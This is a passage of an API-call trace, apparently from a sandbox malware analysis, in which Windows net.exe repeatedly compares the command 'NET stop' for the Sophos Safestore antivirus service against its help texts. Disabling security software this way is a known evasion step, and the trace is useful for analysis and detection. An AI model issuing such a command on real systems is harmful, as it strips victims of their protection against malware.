(hMem=0x735860) returned 0x0 [0208.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x319 [0208.145] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to star", _MaxCount=0x27) returned -5 [0208.145] LocalFree (hMem=0x735860) returned 0x0 [0208.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x483 [0208.145] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are u", _MaxCount=0x27) returned -5 [0208.145] LocalFree (hMem=0x735860) returned 0x0 [0208.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0xa86 [0208.145] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names are", _MaxCount=0x27) returned 4 [0208.145] LocalFree (hMem=0x735860) returned 0x0 [0208.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x54 [0208.145] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore ServiceΓÇ¥", _String2="\r\nFor more information on tools see the", _MaxCount=0x27) returned 97 [0208.145] LocalFree (hMem=0x735860) returned 0x0 [0208.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0xad [0208.145] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:", _MaxCount=0x1c) returned 18 [0208.145] LocalFree (hMem=0x735860) returned 0x0 [0208.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x2e [0208.145] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET COMPUTER\r\n\\\\computername", _MaxCount=0x1c) returned 16 [0208.145] LocalFree (hMem=0x733f70) returned 0x0 [0208.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0x7d [0208.145] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET CONFIG SERVER\r\n[/AUTODIS", _MaxCount=0x1c) returned 16 [0208.145] LocalFree (hMem=0x735860) returned 0x0 [0208.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x26 [0208.145] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET CONFIG\r\n[SERVER | WORKST", _MaxCount=0x1c) returned 16 [0208.145] LocalFree (hMem=0x733f70) returned 0x0 [0208.145] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x19 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 16 [0208.146] LocalFree (hMem=0x733f70) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x1b [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1c) returned 13 [0208.146] LocalFree (hMem=0x733f70) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0xbe [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET GROUP\r\n[groupname [/COMM", _MaxCount=0x1c) returned 12 [0208.146] LocalFree (hMem=0x735860) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x33 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET HELP\r\ncommand\r\n -or-", _MaxCount=0x1c) returned 11 [0208.146] LocalFree (hMem=0x733f70) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x19 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1c) returned 11 [0208.146] LocalFree (hMem=0x733f70) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0xc1 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET LOCALGROUP\r\n[groupname [", _MaxCount=0x1c) returned 7 [0208.146] LocalFree (hMem=0x735860) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x16 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 3 [0208.146] LocalFree (hMem=0x733f70) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x33 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET SESSION\r\n[\\\\computername", _MaxCount=0x1c) returned 15 [0208.146] LocalFree (hMem=0x733f70) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0x234 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1c) returned 12 [0208.146] LocalFree (hMem=0x735860) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x13 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START BROWSER\r\n", _MaxCount=0x1c) returned 14 [0208.146] LocalFree (hMem=0x733f70) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1c) returned 14 [0208.146] LocalFree (hMem=0x733f70) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1c) returned 14 [0208.146] LocalFree (hMem=0x733f70) returned 0x0 [0208.146] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.146] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START MESSENGER\r\n", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START NET LOGON\r\n", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x16 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x11 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START RPCSS\r\n", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x12 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START SERVER\r\n", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0xf [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START UPS\r\n", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x17 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x18 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x2a [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET STATISTICS\r\n[WORKSTATION", _MaxCount=0x1c) returned 14 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 19 [0208.147] LocalFree (hMem=0x733f70) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0x58 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET TIME\r\n\r\n[\\\\computername ", _MaxCount=0x1c) returned -1 [0208.147] LocalFree (hMem=0x735860) returned 0x0 [0208.147] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x184 [0208.147] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET USE\r\n[devicename | *] [\\", _MaxCount=0x1c) returned -2 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0xc7 [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET USER\r\n[username [passwor", _MaxCount=0x1c) returned -2 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x47 [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET VIEW\r\n[\\\\computername [/", _MaxCount=0x1c) returned -3 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0xc2 [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NET\r\n [ ACCOUNTS | COMPUT", _MaxCount=0x1c) returned 19 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x319 [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="SERVICES\r\nNET START can be u", _MaxCount=0x1c) returned -5 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x483 [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="SYNTAX\r\nThe following conven", _MaxCount=0x1c) returned -5 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0xa86 [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="NAMES\r\nThe following types o", _MaxCount=0x1c) returned 4 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0x54 [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Safestore", _String2="\r\nFor more information on to", _MaxCount=0x1c) returned 97 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1塠s1") returned 0xad [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x2e [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0208.148] LocalFree (hMem=0x733f70) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0x7d [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0208.148] LocalFree (hMem=0x735860) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x26 [0208.148] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0208.148] LocalFree (hMem=0x733f70) returned 0x0 [0208.148] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x19 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0208.149] LocalFree (hMem=0x733f70) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x1b [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0208.149] LocalFree (hMem=0x733f70) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0xbe [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0208.149] LocalFree (hMem=0x735860) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x33 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0208.149] LocalFree (hMem=0x733f70) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x19 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0208.149] LocalFree (hMem=0x733f70) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0xc1 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0208.149] LocalFree (hMem=0x735860) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x16 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0208.149] LocalFree (hMem=0x733f70) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x33 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0208.149] LocalFree (hMem=0x733f70) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="塠s⡋瓢1㽰s1") returned 0x234 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0208.149] LocalFree (hMem=0x735860) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1塠s1") returned 0x13 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0208.149] LocalFree (hMem=0x733f70) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0208.149] LocalFree (hMem=0x733f70) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.149] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0208.149] LocalFree (hMem=0x733f70) returned 0x0 [0208.149] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x15 [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x16 [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x11 [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x14 [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x12 [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0xf [0208.150] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0208.150] LocalFree (hMem=0x733f70) returned 0x0 [0208.150] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x31f7e0, nSize=0x0, Arguments=0x31f7dc | out: lpBuffer="㽰s⡋瓢1㽰s1") returned 0x17 